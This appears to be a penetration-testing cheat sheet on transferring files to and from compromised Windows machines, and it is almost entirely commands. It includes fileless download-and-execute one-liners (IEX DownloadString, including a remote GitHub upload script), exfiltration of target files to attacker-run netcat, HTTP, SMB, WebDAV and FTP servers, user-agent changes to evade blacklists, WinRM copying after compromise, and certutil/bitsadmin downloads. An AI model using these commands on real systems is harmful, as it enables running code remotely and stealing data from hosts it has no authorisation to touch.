Windows - File Tranfer

Transferring files to or from Windows machines is crucial in various scenarios. Below are some methods for file transfer that could help to accomplish it and even bypass defenses:

Download to PowerShell

  • Using base64 encoding

#On our machine
md5sum $file    #Check the hash of the file
cat $file |base64 -w0 #Convert content and print it in one line

#On the target machine
PS\> [IO.File]::WriteAllBytes("C:\Users\Public\$file", [Convert]::FromBase64String("$b64String"))
PS\> Get-FileHash C:\Users\Public\i$file -Algorithm md5 #Check hash to confirm the integrity of the file

  • From a web to the target system

PS\> (New-Object Net.WebClient).DownloadFile('$fileURL','$outFile')
PS\> Invoke-WebRequest $fileURL -OutFile $outFile #Alternative, little slower

#If the user Agent is blacklisted we can change it
PS C:\htb> Invoke-WebRequest $fileURL -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "$outFile"

This could also work from a server that we have mounted on our machine

  • Download and execute it directly in memory (fileless)

PS\> IEX (New-Object Net.WebClient).DownloadString('$fileURL')
PS\> (New-Object Net.WebClient).DownloadString('$fileURL') | IEX #Alternative

  • Overpassing parsing errors

PS\> Invoke-WebRequest https://$URL/$file | IEX #Got a parsing error
PS\> Invoke-WebRequest https://$URL/$file -UseBasicParsing | IEX #This solves

Download using SMB

  • Mount an SMB server on our machine to share files and download them on the target machine

#On our machine
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

#On the target machine
PS\> net use n: \\$IP\share /user:test test
PS\> Copy-Item n:\$file

Download using FTP

  • Mount an FTP server on our machine to share files and download them on the target machine

#On our machine
sudo pip install pyftpdlib #Install ftp server module
sudo python -m pyftpdlib --port 21 #Mount server 

#On the target machine
PS\> (New-Object Net.WebClient).DownloadFile('ftp://$IP/$file', 'C:\Users\Public\$file')

  • When not having an interactive terminal a script can be created

PS\> echo open $IP > ftpcommand.txt
PS\> echo USER anonymous >> ftpcommand.txt
PS\> echo binary >> ftpcommand.txt
PS\> echo GET $file >> ftpcommand.txt
PS\> echo bye >> ftpcommand.txt
PS\> ftp -v -n -s:ftpcommand.txt #Execute script in the server

PS\>type $file #Confirm the file have been transferred

Upload from PowerShell

  • Using base64 encoding

# On the target machine
PS\> Get-FileHash $pathToFile -Algorithm md5 #Check hash of the file
PS\> [Convert]::ToBase64String((Get-Content -path "C$pathToFile" -Encoding byte))

#On our machine
echo $b64String | base64 -d > $file
md5sum $file #Check hash to confirm the integrity of the file

  • From the target system to a web 

#On our machine
pip3 install uploadserver
python3 -m uploadserver

#On the target system
PS\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS\> Invoke-FileUpload -Uri http://$IP:$port/upload -File $pathToFile

  • Use base64 encoding to send a web request and catch it with Netcat

#On our machine
nc -nvlp $port

#On the target system
PS\> $b64 = [System.convert]::ToBase64String((Get-Content -Path '$pathToFile' -Encoding Byte))
PS\> Invoke-WebRequest -Uri http://$IP:$port/ -Method POST -Body $b64

Upload using SMB

  • Mount an SMB server on our machine to share files and download them on the target machine

#On our machine
sudo pip install wsgidav
sudo pip install cheroot

sudo wsgidav --host=0.0.0.0 --port=$port --root=/tmp --auth=anonymous

#On the target machine
PS\> dir \\$IP\DavWWWRoot
PS\> Copy-Item $pathToFile \\$IP\DavWWWRoot\

Upload using FTP

  • Mount an FTP server on our machine to share files and download them on the target machine

#On our machine
sudo pip install pyftpdlib #Install ftp server module
sudo python -m pyftpdlib --port 21 --write

#On the target machine
PS\> (New-Object Net.WebClient).UploadFile('ftp://$IP/$fileName', '$pathToFile')

  • When not having an interactive terminal a script can be created

PS\> echo open $IP > ftpcommand.txt
PS\> echo USER anonymous >> ftpcommand.txt
PS\> echo binary >> ftpcommand.txt
PS\> echo PUT $file >> ftpcommand.txt
PS\> echo bye >> ftpcommand.txt
PS\> ftp -v -n -s:ftpcommand.txt

Transfer between Windows hosts using Powershell remote session and WinRM

  • When we have compromised a host and gained access to the Administrator user or any user in the Remote Management Users group

PS\> Test-NetConnection -ComputerName <target> -Port 5985 #Confirm WinRM is open
$Session = New-PSSession -ComputerName <target>
Copy-Item -Path <pathToFile> -ToSession $Session -Destination <destinationPath> #From our host to the target
Copy-Item -Path <pathToFile> -Destination <destinationPath> -FromSession $Session #From the target to our host

Here the usual $ symbols used to sign the things we have to change, are replaced by <> due to the use of this symbol as a reserved operator on PHP

Upload using the RDP protocol

  • When can mount a local resource on the target RDP server

rdesktop $IP -d $domain -u $user -p '$password' -r disk:linux='$pathToFile'
#Alternative
xfreerdp /v:$IP /d:$domain /u:$user /p:'$password' /drive:linux,$pathToFile
cd \\tsclient\linux  #Access mounted directory

Download using integrated Windows Binaries

  • Using bitsadmin

PS\> bitsadmin /transfer wcb /priority foreground $urlToFile $outFile
PS\> Import-Module bitstransfer; Start-BitsTransfer -Source "urlToFile" -Destination "$outFile" #If not preinstalled

  • Using certutil

PS\> certutil.exe -verifyctl -split -f $urlToFile
PreviousExploitationNextLinux - File Tranfer

Last updated